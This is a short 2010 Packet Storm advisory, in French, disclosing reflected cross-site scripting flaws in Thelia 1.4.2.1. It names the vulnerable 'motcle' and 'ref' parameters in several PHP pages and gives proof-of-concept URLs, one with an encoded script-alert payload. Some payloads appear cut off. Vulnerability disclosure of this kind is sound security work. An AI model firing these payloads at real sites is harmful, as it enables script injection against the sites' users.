Thelia 1.4.2.1 Cross Site Scripting

2010-01-18T00:00:00
ID PACKETSTORM:85334
Type packetstorm
Reporter EsSandRe
Modified 2010-01-18T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Thelia  
# Date: 17/01/2010  
# Author: EsSandRe  
# Software Link: http://www.thelia.fr/fichiers/thelia_1.4.2.1.zip  
# Version: 1.4.2.1  
# Tested on: /  
  
  
Vulnérabilité XSS au niveau de la variable 'motcle' de type POST  
  
http://localhost/recherche.php  
  
Une deuxième au niveau de la variable "ref" dans le fichier panier.php ->  
  
http://localhost/panier.php?action=ajouter&ref=[XSS]  
http://localhost/panier.php?action=ajouter&ref=">  
  
Pareil pour le fichier produit.php ->  
  
http://localhost/produit.php?ref=[XSS]  
http://localhost/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1  
  
Et même chose pour rss.php ->  
  
http://localhost/rss.php?ref=[XSS]  
http://localhost/rss.php?ref=">&id_rubrique=  
  
  
<Greetz>  
  
Frf2,Stink',SheitaN,Metropolis,PhOeNiX95,Az£L Z£L and all others i forgot ;)  
  
</Greetz>  
  
  
________________________________  
Vous cherchez l'intégrale des clips de Michael Jackson ? Bing ! Trouvez !<http://www.bing.com/videos/search?q=Michael+Jackson&FORM=MVDE6>  
  
  
  
`